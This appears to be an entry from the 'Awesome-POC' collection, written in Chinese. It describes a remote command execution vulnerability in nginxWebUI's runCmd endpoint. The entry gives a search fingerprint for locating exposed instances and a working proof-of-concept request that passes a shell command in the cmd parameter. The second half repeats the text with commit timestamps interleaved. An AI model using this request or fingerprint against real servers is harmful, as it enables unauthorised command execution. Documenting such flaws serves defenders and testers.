Awesome-POC/Web应用漏洞/nginxWebUI runCmd 远程命令执行漏洞.md

# nginxWebUI runCmd 远程命令执行漏洞

## 漏洞描述

nginxWebUI runCmd 接口存在远程命令执行漏洞，攻击者通过漏洞可以获取到服务器权限，执行任意命令

## 漏洞影响

nginxWebUI

## 网络测绘

```
title="nginxwebui"
```

## 漏洞复现

登录页面

![image-20230704113502611](./images/image-20230704113502611.png)

验证请求包

```
/AdminPage/conf/runCmd?cmd=id
```

![image-20230704113520591](./images/image-20230704113520591.png)
更新漏洞 2023-07-05 09:20:42 +08:00			`# nginxWebUI runCmd 远程命令执行漏洞`

			`## 漏洞描述`

			`nginxWebUI runCmd 接口存在远程命令执行漏洞，攻击者通过漏洞可以获取到服务器权限，执行任意命令`

			`## 漏洞影响`

			`nginxWebUI`

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
更新漏洞 2023-07-05 09:20:42 +08:00
			```
			`title="nginxwebui"`
			```

			`## 漏洞复现`

			`登录页面`

更新漏洞 2023-07-11 10:57:15 +08:00			`![image-20230704113502611](./images/image-20230704113502611.png)`
更新漏洞 2023-07-05 09:20:42 +08:00
			`验证请求包`

			```
			`/AdminPage/conf/runCmd?cmd=id`
			```

更新漏洞 2023-07-11 10:57:15 +08:00			`![image-20230704113520591](./images/image-20230704113520591.png)`